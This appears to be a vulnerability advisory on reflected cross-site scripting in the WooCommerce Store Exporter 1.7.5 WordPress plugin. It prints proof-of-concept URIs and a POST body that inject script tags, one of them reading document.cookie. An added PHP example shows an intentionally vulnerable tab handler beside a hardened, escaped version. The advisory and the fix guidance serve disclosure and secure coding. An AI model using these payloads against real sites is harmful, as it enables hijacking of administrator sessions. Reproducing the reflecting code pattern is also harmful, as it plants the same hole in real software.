WordPress WooCommerce - Store Exporter Plugin Multiple Cross Site Scripting Vulnerabilities
BID: 69434
Info
| Bugtraq ID: | 69434 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 26 2014 12:00AM |
| Updated: | Aug 26 2014 12:00AM |
| Credit: | Mike Manzotti |
| Vulnerable: | Visser Labs WooCommerce - Store Exporter 1.7.5 |
| Not Vulnerable: | Visser Labs WooCommerce - Store Exporter 1.7.6 |
Exploit / POC
To exploit these issues an attacker must entice an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
http://www.example.com/wp/wp-admin/admin.php?page=woo_ce&tab=<script>alert(1)</script>
http://www.example.com/wp/wp-admin/admin.php?page=woo_ce&tab=<script>alert(document.cookie)</script>
http://www.example.com/wp/wp-admin/admin.php?page=woo_ce&tab=settings
POST http://www.example.com/wp/wp-admin/admin.php?page=woo_ce&tab=export
dataset=users1be3c<script>alert(1)<%2fscript>87acc&product_fields_order%5Bparent_id%5D=&product_fields_order%5Bparent_sku%5D=&product_fields_order%5Bproduct_id%5D=&product_fields_order%5Bsku%5D=&product_field
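The two proof-of-concept requests above share one root cause: a request parameter (`tab` on the GET, `dataset` in the POST body) is reflected into the admin page without validation or output encoding. The following PHP is an added example written for this page, not the Store Exporter plugin's actual source (which the advisory does not show): a hypothetical WordPress admin tab handler in its reflecting form beside the standard WordPress-API fix of allowlisting the parameter and escaping at the output sink. The function names, the `overview` default tab, the dataset names other than `users`, and the nonce action name are assumptions.

```php
<?php
// Added example, not the plugin's code. Models the generic pattern behind the
// reported reflected XSS and the WordPress-idiomatic fix. Assumes it runs
// inside WordPress (sanitize_key, wp_unslash, esc_*, add_query_arg, admin_url,
// check_admin_referer are core functions).

// --- Reflecting pattern (hypothetical): the tab name is echoed unescaped ---
function woo_ce_example_render_tab_reflecting() {
    $tab = isset( $_GET['tab'] ) ? $_GET['tab'] : 'overview';
    // Raw request data concatenated into HTML: whatever ?tab= carries is
    // rendered verbatim in the logged-in administrator's browser.
    echo '<h2 class="nav-tab-wrapper"><a class="nav-tab nav-tab-active">' . $tab . '</a></h2>';
}

// --- Hardened pattern: allowlist the identifier, escape everything output ---
function woo_ce_example_allowed_tabs() {
    // 'export' and 'settings' appear in the advisory's URIs; 'overview' is an
    // assumed default.
    return array( 'overview', 'export', 'settings' );
}

function woo_ce_example_current_tab() {
    $allowed = woo_ce_example_allowed_tabs();
    // sanitize_key() lowercases and strips everything outside [a-z0-9_-], so
    // markup cannot survive; the allowlist then rejects unknown values rather
    // than reflecting them back.
    $tab = isset( $_GET['tab'] ) ? sanitize_key( wp_unslash( $_GET['tab'] ) ) : 'overview';
    return in_array( $tab, $allowed, true ) ? $tab : 'overview';
}

function woo_ce_example_render_tabs_hardened() {
    $current = woo_ce_example_current_tab();
    echo '<h2 class="nav-tab-wrapper">';
    foreach ( woo_ce_example_allowed_tabs() as $tab ) {
        $url   = add_query_arg( array( 'page' => 'woo_ce', 'tab' => $tab ), admin_url( 'admin.php' ) );
        $class = 'nav-tab' . ( $tab === $current ? ' nav-tab-active' : '' );
        // Contextual escaping at the sink: attribute, URL and text each get the
        // encoder for their context, so no value can break out of the markup.
        printf(
            '<a class="%s" href="%s">%s</a>',
            esc_attr( $class ),
            esc_url( $url ),
            esc_html( ucfirst( $tab ) )
        );
    }
    echo '</h2>';
}

// The POST 'dataset' field from the advisory follows the same rule. A nonce
// check additionally stops a forged cross-site form submission from reaching
// this code at all (action name 'woo_ce_export' is assumed).
function woo_ce_example_dataset_from_post() {
    check_admin_referer( 'woo_ce_export' );
    // 'users' is the value in the advisory's POST body; the others are assumed.
    $known = array( 'products', 'categories', 'tags', 'orders', 'users' );
    if ( ! isset( $_POST['dataset'] ) ) {
        return '';
    }
    $dataset = sanitize_key( wp_unslash( $_POST['dataset'] ) );
    // Unknown datasets yield '' and are never echoed; if a caller must display
    // the chosen value it still goes through esc_html() first.
    return in_array( $dataset, $known, true ) ? $dataset : '';
}
```

The design point is that sanitisation alone is not the fix: `sanitize_key()` makes the value safe only because the code then compares it against a fixed set of known identifiers and never trusts the request value as display text. The `esc_*` calls at the sink are kept regardless, so a future change that widens the allowlist does not silently reintroduce the reflection.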
Solution / Fix
Solution:
Reportedly the issue is fixed; however, Symantec has not confirmed this. Please contact the vendor for more information.
References
References:
- WooCommerce - Store Exporter Changelog (Visser Labs)
- WooCommerce - Store Exporter Product Page (Visser Labs)